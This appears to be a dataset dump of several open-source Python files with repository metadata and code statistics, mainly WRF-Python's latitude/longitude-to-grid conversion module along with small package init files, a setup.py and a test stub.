|
[
"MIT"
] | 3
|
2022-03-30T04:00:34.000Z
|
2022-03-30T04:11:44.000Z
|
# Copyright (c) 2022, Momscode Technologies and Contributors
# See license.txt
# import frappe
import unittest
class TestEstimateBOM(unittest.TestCase):
pass
| 17.888889
| 60
| 0.795031
| 19
| 161
| 6.736842
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028777
| 0.136646
| 161
| 8
| 61
| 20.125
| 0.892086
| 0.546584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0a91d93bf2ba49a605e944d46de6c98fe517942d
| 256
|
py
|
Python
|
setup.py
|
danielezambelli/latex2mathml
|
ef1b3455073a6027bf6384030075940b6fa1f1c2
|
[
"MIT"
] | null | null | null |
setup.py
|
danielezambelli/latex2mathml
|
ef1b3455073a6027bf6384030075940b6fa1f1c2
|
[
"MIT"
] | null | null | null |
setup.py
|
danielezambelli/latex2mathml
|
ef1b3455073a6027bf6384030075940b6fa1f1c2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# __author__ = "Ronie Martinez"
# __copyright__ = "Copyright 2016-2019, Ronie Martinez"
# __credits__ = ["Ronie Martinez"]
# __maintainer__ = "Ronie Martinez"
# __email__ = "ronmarti18@gmail.com"
from setuptools import setup
setup()
| 25.6
| 55
| 0.738281
| 28
| 256
| 6.035714
| 0.714286
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045045
| 0.132813
| 256
| 9
| 56
| 28.444444
| 0.716216
| 0.804688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
0af3151e1846c051ae2fa0056cebe4d981b7f2e3
| 101
|
py
|
Python
|
opentracing_prometheus/__init__.py
|
casualjim/python-opentracing-prometheus
|
d00fa3166611717bc22d662fad930d0c573be5f1
|
[
"MIT"
] | 1
|
2019-11-14T08:57:48.000Z
|
2019-11-14T08:57:48.000Z
|
opentracing_prometheus/__init__.py
|
casualjim/python-opentracing-prometheus
|
d00fa3166611717bc22d662fad930d0c573be5f1
|
[
"MIT"
] | null | null | null |
opentracing_prometheus/__init__.py
|
casualjim/python-opentracing-prometheus
|
d00fa3166611717bc22d662fad930d0c573be5f1
|
[
"MIT"
] | null | null | null |
from tracing import TracerMiddleware
from metrics import PrometheusMetricsFactory, PrometheusReporter
| 50.5
| 64
| 0.910891
| 9
| 101
| 10.222222
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079208
| 101
| 2
| 64
| 50.5
| 0.989247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7c268a2d348f38e46d734631e5391d902dd233a3
| 379
|
py
|
Python
|
uimnet/workers/__init__.py
|
facebookresearch/uimnet
|
d7544cf5fb4c65cb262dca203afb0db4ba6c569d
|
[
"MIT"
] | 7
|
2021-07-28T18:40:20.000Z
|
2022-01-26T23:50:41.000Z
|
uimnet/workers/__init__.py
|
facebookresearch/uimnet
|
d7544cf5fb4c65cb262dca203afb0db4ba6c569d
|
[
"MIT"
] | 10
|
2021-08-31T13:44:56.000Z
|
2021-08-31T14:10:12.000Z
|
uimnet/workers/__init__.py
|
facebookresearch/uimnet
|
d7544cf5fb4c65cb262dca203afb0db4ba6c569d
|
[
"MIT"
] | 1
|
2021-11-06T01:55:58.000Z
|
2021-11-06T01:55:58.000Z
|
#!/usr/bin/env python3
#
# # Copyright (c) 2021 Facebook, inc. and its affiliates. All Rights Reserved
#
#
from uimnet.workers.base import *
from uimnet.workers.evaluator import *
from uimnet.workers.trainer import *
from uimnet.workers.embeddings_extractor import *
from uimnet.workers.calibrator import *
from uimnet.workers.mog import *
from uimnet.workers.predictor import *
| 29.153846
| 77
| 0.783641
| 51
| 379
| 5.803922
| 0.529412
| 0.236486
| 0.402027
| 0.466216
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015015
| 0.121372
| 379
| 12
| 78
| 31.583333
| 0.873874
| 0.253298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7ca6620c9a94c4e0e5b8f32c68601989bf4fcc52
| 127
|
py
|
Python
|
chroma/chroma/bvh/__init__.py
|
youngsm/chroma
|
1e183c26aaff46fb9b0425ad8eef9995ebe0be2c
|
[
"BSD-3-Clause"
] | 7
|
2018-05-02T08:33:10.000Z
|
2021-11-15T02:03:01.000Z
|
chroma/chroma/bvh/__init__.py
|
youngsm/chroma
|
1e183c26aaff46fb9b0425ad8eef9995ebe0be2c
|
[
"BSD-3-Clause"
] | 1
|
2020-08-19T13:43:58.000Z
|
2020-08-19T13:43:58.000Z
|
chroma/chroma/bvh/__init__.py
|
youngsm/chroma
|
1e183c26aaff46fb9b0425ad8eef9995ebe0be2c
|
[
"BSD-3-Clause"
] | 16
|
2016-03-25T01:49:26.000Z
|
2021-09-09T15:51:34.000Z
|
from chroma.bvh.bvh import *
from chroma.bvh.grid import make_recursive_grid_bvh
from chroma.bvh.simple import make_simple_bvh
| 31.75
| 51
| 0.850394
| 22
| 127
| 4.681818
| 0.363636
| 0.291262
| 0.378641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094488
| 127
| 3
| 52
| 42.333333
| 0.895652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
7cd8127a5b908dc025471127ba2db5ac904b5960
| 215
|
py
|
Python
|
src/typeDefs/stationwiseVdiData.py
|
rohit98077/wrldc_mis_weekly_report_generator
|
13969db6bf6359e1bd9663d289f903c22d8b7e61
|
[
"MIT"
] | null | null | null |
src/typeDefs/stationwiseVdiData.py
|
rohit98077/wrldc_mis_weekly_report_generator
|
13969db6bf6359e1bd9663d289f903c22d8b7e61
|
[
"MIT"
] | 7
|
2020-09-18T11:37:36.000Z
|
2020-09-26T12:29:30.000Z
|
src/typeDefs/stationwiseVdiData.py
|
rohit98077/wrldc_mis_weekly_report_generator
|
13969db6bf6359e1bd9663d289f903c22d8b7e61
|
[
"MIT"
] | 3
|
2020-09-19T07:28:40.000Z
|
2020-09-25T05:49:15.000Z
|
from typing import TypedDict, List
from src.typeDefs.stationVdiProfile import IStationVdiProfile
class IStationwiseVdi(TypedDict):
vdi400Rows: List[IStationVdiProfile]
vdi765Rows: List[IStationVdiProfile]
| 26.875
| 61
| 0.827907
| 20
| 215
| 8.9
| 0.65
| 0.247191
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031579
| 0.116279
| 215
| 7
| 62
| 30.714286
| 0.905263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6b1d2da1bd9020ad5665f534d6082fe7558c8587
| 28,491
|
py
|
Python
|
src/wrf/g_latlon.py
|
khallock/wrf-python
|
9c5825c101722e7eddece2ca13cc8e9d9f96a21e
|
[
"Apache-2.0"
] | 1
|
2018-10-30T18:06:26.000Z
|
2018-10-30T18:06:26.000Z
|
src/wrf/g_latlon.py
|
mostamndi/wrf-python
|
3806bcdd01b31fa67da980eafefa0d1245faf6a6
|
[
"Apache-2.0"
] | null | null | null |
src/wrf/g_latlon.py
|
mostamndi/wrf-python
|
3806bcdd01b31fa67da980eafefa0d1245faf6a6
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import (absolute_import, division, print_function)
from collections import OrderedDict
import numpy as np
from .util import extract_vars, get_id, get_iterable, is_mapping, to_np
from .py3compat import viewkeys
from .latlonutils import _lat_varname, _lon_varname, _ll_to_xy, _xy_to_ll
from .metadecorators import set_latlon_metadata
from .config import xarray_enabled
if xarray_enabled():
from xarray import DataArray
def get_lat(wrfin, timeidx=0, method="cat", squeeze=True,
cache=None, meta=True, _key=None,
stagger=None):
"""Return the two dimensional latitude coordinate variable.
This functions extracts the necessary variables from the NetCDF file
object in order to perform the calculation.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
method (:obj:`str`, optional): The aggregation method to use for
sequences. Must be either 'cat' or 'join'.
'cat' combines the data along the Time dimension.
'join' creates a new dimension for the file index.
The default is 'cat'.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
cache (:obj:`dict`, optional): A dictionary of (varname, ndarray)
that can be used to supply pre-extracted NetCDF variables to the
computational routines. It is primarily used for internal
purposes, but can also be used to improve performance by
eliminating the need to repeatedly extract the same variables
used in multiple diagnostics calculations, particularly when using
large sequences of files.
Default is None.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
_key (:obj:`int`, optional): A caching key. This is used for internal
purposes only. Default is None.
stagger (:obj:`str`): By default, the latitude is returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
two dimensional latitude coordinate variable.
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
varname = _lat_varname(wrfin, stagger)
lat_var = extract_vars(wrfin, timeidx, varname, method, squeeze, cache,
meta, _key)
return lat_var[varname]
def get_lon(wrfin, timeidx=0, method="cat", squeeze=True,
cache=None, meta=True, _key=None,
stagger=None):
"""Return the two dimensional longitude coordinate variable.
This functions extracts the necessary variables from the NetCDF file
object in order to perform the calculation.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
method (:obj:`str`, optional): The aggregation method to use for
sequences. Must be either 'cat' or 'join'.
'cat' combines the data along the Time dimension.
'join' creates a new dimension for the file index.
The default is 'cat'.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
cache (:obj:`dict`, optional): A dictionary of (varname, ndarray)
that can be used to supply pre-extracted NetCDF variables to the
computational routines. It is primarily used for internal
purposes, but can also be used to improve performance by
eliminating the need to repeatedly extract the same variables
used in multiple diagnostics calculations, particularly when using
large sequences of files.
Default is None.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
_key (:obj:`int`, optional): A caching key. This is used for internal
purposes only. Default is None.
stagger (:obj:`str`): By default, the longitude is returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
two dimensional longitude coordinate variable.
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
varname = _lon_varname(wrfin, stagger)
lon_var = extract_vars(wrfin, timeidx, varname, method, squeeze, cache,
meta, _key)
return lon_var[varname]
def _llxy_mapping(wrfin, x_or_lat, y_or_lon, func, timeidx, stagger,
squeeze, meta, as_int=None):
"""Return the x,y/lat,lon coordinates for a dictionary input.
The leftmost dimension(s) for the result is:
- return_val[key,...,0,...] will contain the x/lat values.
- return_val[key,...,1,...] will contain the y/lon values.
Nested dictionaries are allowed.
Args:
wrfin (:obj:`dict`): A mapping of key name to a WRF NetCDF file object
or sequence of WRF NetCDF file objects.
x_or_lat (:obj:`float` or sequence): A single latitude/x value or a
sequence of latitude/x values to be converted.
y_or_lon (:obj:`float` or sequence): A single longitude/y value or a
sequence of longitude/y values to be converted.
func (function): Either the xy_to_ll or ll_to_xy function.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
stagger (:obj:`str`): By default, the values are returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
as_int (:obj:`bool`, optional): Set to True to return the x,y values as
:obj:`int`, otherwise they will be returned as :obj:`float`. This
is only used when *func* is ll_to_xy.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
lat,lon/x,y coordinate value(s) whose leftmost dimensions are the
dictionary keys, followed by a dimension of size
2 (0=X, 1=Y)/(0=lat, 1=lon).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
keynames = []
# This might not work once mapping iterators are implemented
numkeys = len(wrfin)
key_iter = iter(viewkeys(wrfin))
first_key = next(key_iter)
keynames.append(first_key)
first_args = [wrfin[first_key], x_or_lat, y_or_lon, timeidx, squeeze,
meta, stagger]
if as_int is not None:
first_args.append(as_int)
first_array = func(*first_args)
# Create the output data numpy array based on the first array
outdims = [numkeys]
outdims += first_array.shape
outdata = np.empty(outdims, first_array.dtype)
outdata[0,:] = first_array[:]
idx = 1
while True:
try:
key = next(key_iter)
except StopIteration:
break
else:
keynames.append(key)
args = [wrfin[first_key], x_or_lat, y_or_lon, timeidx, squeeze,
meta, stagger]
if as_int is not None:
args.append(as_int)
result_array = func(*args)
if outdata.shape[1:] != result_array.shape:
raise ValueError("data sequences must have the "
"same size for all dictionary keys")
outdata[idx,:] = to_np(result_array)[:]
idx += 1
if xarray_enabled() and meta:
outname = str(first_array.name)
# Note: assumes that all entries in dict have same coords
outcoords = OrderedDict(first_array.coords)
# First find and store all the existing key coord names/values
# This is applicable only if there are nested dictionaries.
key_coordnames = []
coord_vals = []
existing_cnt = 0
while True:
key_coord_name = "key_{}".format(existing_cnt)
if key_coord_name not in first_array.dims:
break
key_coordnames.append(key_coord_name)
coord_vals.append(to_np(first_array.coords[key_coord_name]))
existing_cnt += 1
# Now add the key coord name and values for THIS dictionary.
# Put the new key_n name at the bottom, but the new values will
# be at the top to be associated with key_0 (left most). This
# effectively shifts the existing 'key_n' coordinate values to the
# right one dimension so *this* dicionary's key coordinate values
# are at 'key_0'.
key_coordnames.append(key_coord_name)
coord_vals.insert(0, keynames)
# make it so that key_0 is leftmost
outdims = key_coordnames + list(first_array.dims[existing_cnt:])
# Create the new 'key_n', value pairs
for coordname, coordval in zip(key_coordnames, coord_vals):
outcoords[coordname] = coordval
outattrs = OrderedDict(first_array.attrs)
outarr = DataArray(outdata, name=outname, coords=outcoords,
dims=outdims, attrs=outattrs)
else:
outarr = outdata
return outarr
@set_latlon_metadata(xy=True)
def ll_to_xy(wrfin, latitude, longitude, timeidx=0,
squeeze=True, meta=True, stagger=None, as_int=True):
"""Return the x,y coordinates for a specified latitude and longitude.
The *latitude* and *longitude* arguments can be a single value or a
sequence of values.
The leftmost dimension of the returned array represents two different
quantities:
- return_val[0,...] will contain the X (west_east) values.
- return_val[1,...] will contain the Y (south_north) values.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
latitude (:obj:`float` or sequence): A single latitude or a sequence
of latitude values to be converted.
longitude (:obj:`float` or sequence): A single longitude or a sequence
of latitude values to be converted.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
stagger (:obj:`str`): By default, the latitude is returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
as_int (:obj:`bool`): Set to False to return the x,y values as
:obj:`float`, otherwise they will be returned as :obj:`int`.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
x,y coordinate value(s) whose leftmost dimension is 2 (0=X, 1=Y).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
if is_mapping(wrfin):
return _llxy_mapping(wrfin, latitude, longitude, ll_to_xy,
timeidx, stagger, squeeze, meta, as_int)
_key = get_id(wrfin)
_wrfin = get_iterable(wrfin)
return _ll_to_xy(latitude, longitude, _wrfin, timeidx, stagger, "cat",
squeeze, None, _key, as_int, **{})
@set_latlon_metadata(xy=True)
def ll_to_xy_proj(latitude, longitude, meta=True, squeeze=True, as_int=True,
map_proj=None, truelat1=None, truelat2=None, stand_lon=None,
ref_lat=None, ref_lon=None, pole_lat=None, pole_lon=None,
known_x=None, known_y=None, dx=None, dy=None,
latinc=None, loninc=None):
"""Return the x, y coordinates for a specified latitude and longitude.
The *latitude* and *longitude* arguments can be a single value or a
sequence of values. This version of the ll_to_xy routine allows users
to manually specify projection parameters.
The leftmost dimension of the returned array represents two different
quantities:
- return_val[0,...] will contain the X (west_east) values.
- return_val[1,...] will contain the Y (south_north) values.
Args:
latitude (:obj:`float` or sequence): A single latitude or a sequence
of latitude values to be converted.
longitude (:obj:`float` or sequence): A single longitude or a sequence
of latitude values to be converted.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
as_int (:obj:`bool`): Set to False to return the x,y values as
:obj:`float`, otherwise they will be returned as :obj:`int`.
map_proj (:obj:`int`): Model projection [1=Lambert Conformal,
2=Polar Stereographic, 3=Mercator, 6=Lat-Lon]. Required.
truelat1 (:obj:`float`): True latitude 1. Required for
map_proj = 1, 2, 3 (defaults to 0 otherwise).
truelat2 (:obj:`float`): True latitude 2. Optional for
map_proj = 1 (defaults to 0 otherwise).
stand_lon (:obj:`float`): Standard longitude. Required.
ref_lat (:obj:`float`): A reference latitude. Required.
ref_lon (:obj:`float`): A reference longitude. Required.
known_x (:obj:`float`): The known x-coordinate associated with
*ref_lon*. Required.
known_y (:obj:`float`): The known y-coordinate associated with
*ref_lat*. Required.
pole_lat (:obj:`float`): Pole latitude. Optional for
*map_proj* = 6 (defaults to 90 otherwise).
pole_lon (:obj:`float`): Pole longitude. Optional for
*map_proj* = 6 (defaults to 0 otherwise).
dx (:obj:`float`): The x spacing in meters at the true latitude.
Required for *map_proj* = 1, 2, 3 (defaults to 0 otherwise).
dy (:obj:`float`) - The y spacing in meters at the true latitude.
Required for *map_proj* = 1, 2, 3 (defaults to 0 otherwise).
latinc (:obj:`float`): Required for *map_proj* = 6. Defined as:
.. code-block:: python
latinc = (dy*360.0)/2.0/Constants.PI/Constants.WRF_EARTH_RADIUS
loninc (:obj:`float`): Required for *map_proj* = 6. Defined as:
.. code-block:: python
loninc = (dx*360.0)/2.0/Constants.PI/Constants.WRF_EARTH_RADIUS
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
x,y coordinate value(s) whose leftmost dimension is 2 (0=X, 1=Y).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
loc = locals()
projparams = {name : loc[name] for name in ("map_proj", "truelat1",
"truelat2", "stand_lon", "ref_lat",
"ref_lon", "pole_lat", "pole_lon",
"known_x", "known_y", "dx", "dy",
"latinc", "loninc")}
return _ll_to_xy(latitude, longitude, None, 0, True, "cat", squeeze, None,
None, as_int, **projparams)
@set_latlon_metadata(xy=False)
def xy_to_ll(wrfin, x, y, timeidx=0, squeeze=True, meta=True, stagger=None):
"""Return the latitude and longitude for specified x,y coordinates.
The *x* and *y* arguments can be a single value or a sequence of values.
The leftmost dimension of the returned array represents two different
quantities:
- return_val[0,...] will contain the latitude values.
- return_val[1,...] will contain the longitude values.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
x (:obj:`float` or sequence): A single x-coordinate or a sequence
of x-coordinate values to be converted.
y (:obj:`float` or sequence): A single y-coordinate or a sequence
of y-coordinate values to be converted.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
stagger (:obj:`str`): By default, the latitude is returned on the mass
grid, but a staggered grid can be chosen with the following
options:
- 'm': Use the mass grid (default).
- 'u': Use the same staggered grid as the u wind component,
which has a staggered west_east (x) dimension.
- 'v': Use the same staggered grid as the v wind component,
which has a staggered south_north (y) dimension.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
latitude and longitude values whose leftmost dimension is 2
(0=latitude, 1=longitude).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
if is_mapping(wrfin):
return _llxy_mapping(wrfin, x, y, xy_to_ll,
timeidx, stagger, squeeze, meta)
_key = get_id(wrfin)
_wrfin = get_iterable(wrfin)
return _xy_to_ll(x, y, _wrfin, timeidx, stagger, "cat", True, None,
_key, **{})
@set_latlon_metadata(xy=False)
def xy_to_ll_proj(x, y, meta=True, squeeze=True, map_proj=None, truelat1=None,
truelat2=None, stand_lon=None, ref_lat=None, ref_lon=None,
pole_lat=None, pole_lon=None, known_x=None, known_y=None,
dx=None, dy=None, latinc=None, loninc=None):
"""Return the latitude and longitude for the specified x,y coordinates.
The *x* and *y* arguments can be a single value or a
sequence of values. This version of the xy_to_ll routine allows users
to manually specify map projection parameters.
The leftmost dimension of the returned array represents two different
quantities:
- return_val[0,...] will contain the latitude values.
- return_val[1,...] will contain the longitude values.
Args:
x (:obj:`float` or sequence): A single x-coordinate or a sequence
of x-coordinate values to be converted.
y (:obj:`float` or sequence): A single y-coordinate or a sequence
of y-coordinate values to be converted.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
map_proj (:obj:`int`): Model projection [1=Lambert Conformal,
2=Polar Stereographic, 3=Mercator, 6=Lat-Lon]. Required.
truelat1 (:obj:`float`): True latitude 1. Required for
map_proj = 1, 2, 3 (defaults to 0 otherwise).
truelat2 (:obj:`float`): True latitude 2. Optional for
map_proj = 1 (defaults to 0 otherwise).
stand_lon (:obj:`float`): Standard longitude. Required.
ref_lat (:obj:`float`): A reference latitude. Required.
ref_lon (:obj:`float`): A reference longitude. Required.
known_x (:obj:`float`): The known x-coordinate associated with
*ref_lon*. Required.
known_y (:obj:`float`): The known y-coordinate associated with
*ref_lat*. Required.
pole_lat (:obj:`float`): Pole latitude. Optional for
*map_proj* = 6 (defaults to 90 otherwise).
pole_lon (:obj:`float`): Pole longitude. Optional for
*map_proj* = 6 (defaults to 0 otherwise).
dx (:obj:`float`): The x spacing in meters at the true latitude.
Required for *map_proj* = 1, 2, 3 (defaults to 0 otherwise).
dy (:obj:`float`) - The y spacing in meters at the true latitude.
Required for *map_proj* = 1, 2, 3 (defaults to 0 otherwise).
latinc (:obj:`float`): Required for *map_proj* = 6. Defined as:
.. code-block:: python
latinc = (dy*360.0)/2.0/Constants.PI/Constants.WRF_EARTH_RADIUS
loninc (:obj:`float`): Required for *map_proj* = 6. Defined as:
.. code-block:: python
loninc = (dx*360.0)/2.0/Constants.PI/Constants.WRF_EARTH_RADIUS
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: The
latitude and longitude values whose leftmost dimension is 2
(0=latitude, 1=longitude).
If xarray is enabled and the *meta* parameter is True, then the result
will be a :class:`xarray.DataArray` object. Otherwise, the result will
be a :class:`numpy.ndarray` object with no metadata.
"""
loc = locals()
projparams = {name : loc[name] for name in ("map_proj", "truelat1",
"truelat2", "stand_lon", "ref_lat",
"ref_lon", "pole_lat", "pole_lon",
"known_x", "known_y", "dx", "dy",
"latinc", "loninc")}
return _xy_to_ll(x, y, None, 0, None, "cat", squeeze, None, None,
**projparams)
| 43.037764
| 80
| 0.585904
| 3,622
| 28,491
| 4.5254
| 0.094423
| 0.019035
| 0.02178
| 0.011714
| 0.831676
| 0.823806
| 0.80776
| 0.796474
| 0.783662
| 0.76786
| 0
| 0.008067
| 0.329999
| 28,491
| 662
| 81
| 43.037764
| 0.850595
| 0.70854
| 0
| 0.3125
| 0
| 0
| 0.042249
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054688
| false
| 0
| 0.070313
| 0
| 0.195313
| 0.007813
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6b360f60238786e6c0ab6fef11d7be1c3634fffe
| 6,362
|
py
|
Python
|
test-common/functiontest/testcase/grp_client/sut_put.py
|
imotai8915/fedb
|
fe0c130f70206325f130f00be6c1483c9c36d113
|
[
"Apache-2.0"
] | 1
|
2021-08-23T12:02:30.000Z
|
2021-08-23T12:02:30.000Z
|
test-common/functiontest/testcase/grp_client/sut_put.py
|
imotai8915/fedb
|
